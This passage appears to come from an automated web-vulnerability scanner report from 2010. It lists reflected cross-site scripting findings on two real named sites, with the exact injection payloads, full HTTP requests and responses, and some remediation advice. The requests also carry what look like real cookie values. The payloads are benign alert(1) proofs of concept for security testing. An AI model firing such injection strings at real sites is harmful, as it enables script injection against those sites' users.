GET /2/B3DM/DLXb2fab"><script>alert(1)</script>3cd711156ce/11053880328@x95 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:31 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39251"><script>alert(1)</script>ce638938be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/11053880328@x9539251"><script>alert(1)</script>ce638938be HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:35 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 322 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
5.9. http://dm.de.mookie1.com/2/B3DM/DLX/11053880328@x95 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/DLX/11053880328@x95
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da14'-alert(1)-'9c9e315e2c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/DLX/11053880328@x95?6da14'-alert(1)-'9c9e315e2c5=1 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:18 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 3463 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660;path=/
<script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }
var dlx_segment_list = '6da14'-alert(1)-'9c9e315e2c5=1';
var dlx_segment_list_pairs=dlx_segment_list.split('|'); var ZAP_url='http://t.mookie1.com/t/v1/event?migClientId=1214&migAction=';
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edb57"><script>alert(1)</script>a664fc42d16 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMedb57"><script>alert(1)</script>a664fc42d16/DLX/11611717638@x92 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:27 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea58c"><script>alert(1)</script>27fa3aa330d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLXea58c"><script>alert(1)</script>27fa3aa330d/11611717638@x92 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:30 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 330 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 345ae"><script>alert(1)</script>0b9ea008699 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/DLX/11611717638@x92345ae"><script>alert(1)</script>0b9ea008699 HTTP/1.1 Host: dm.de.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=2754917663; RMFL=011PBBnLU107OI|U107OJ|U107OK; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; OAX=rnneEkzIfzcAAk/A;
Response
HTTP/1.1 200 OK Date: Sun, 07 Nov 2010 00:54:33 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 323 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/
The value of the adminOver request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0933"%3balert(1)//f1709e21753 was submitted in the adminOver parameter. This input was echoed as a0933";alert(1)//f1709e21753 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:59 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Cache-Expires: Sat, 06 Nov 2010 14:30:19 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the autostart request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59854"%3balert(1)//cc78248a523 was submitted in the autostart parameter. This input was echoed as 59854";alert(1)//cc78248a523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:23:20 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:23:20 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:31:40 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1371
The value of the player request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb4ee"%3balert(1)//e664ff0054e was submitted in the player parameter. This input was echoed as fb4ee";alert(1)//e664ff0054e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:20:43 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:20:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:29:03 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 1399
The value of the adminOver request parameter is copied into the XML document as plain text between tags. The payload 89c9d<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>99ff36eea82 was submitted in the adminOver parameter. This input was echoed as 89c9d<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>99ff36eea82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:38 GMT Content-Type: text/xml;charset=UTF-8 Last-Modified: Sat, 06 Nov 2010 14:17:38 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 06 Nov 2010 14:25:58 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 6403
The value of the height request parameter is copied into a JavaScript rest-of-line comment. The payload dcdc8%0aalert(1)//e7db8367081 was submitted in the height parameter. This input was echoed as dcdc8 alert(1)//e7db8367081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9dcdc8%0aalert(1)//e7db8367081&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:46 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3092
The value of the height request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f548a'%3balert(1)//361c204b438 was submitted in the height parameter. This input was echoed as f548a';alert(1)//361c204b438 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=f548a'%3balert(1)//361c204b438&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN35 Cache-Expires: Sat, 06 Nov 2010 14:27:44 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2858
The value of the id request parameter is copied into a JavaScript rest-of-line comment. The payload dfe78</script><script>alert(1)</script>983380015ec was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897dfe78</script><script>alert(1)</script>983380015ec&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 14:26:27 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2752
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b19d"><script>alert(1)</script>5126c3ab88e was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /videohub/mpf/frame/playerEmbed?id=56548979b19d"><script>alert(1)</script>5126c3ab88e&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 14:26:13 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2710
The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50a75'%3balert(1)//eef911a8eef was submitted in the id parameter. This input was echoed as 50a75';alert(1)//eef911a8eef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=565489750a75'%3balert(1)//eef911a8eef&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
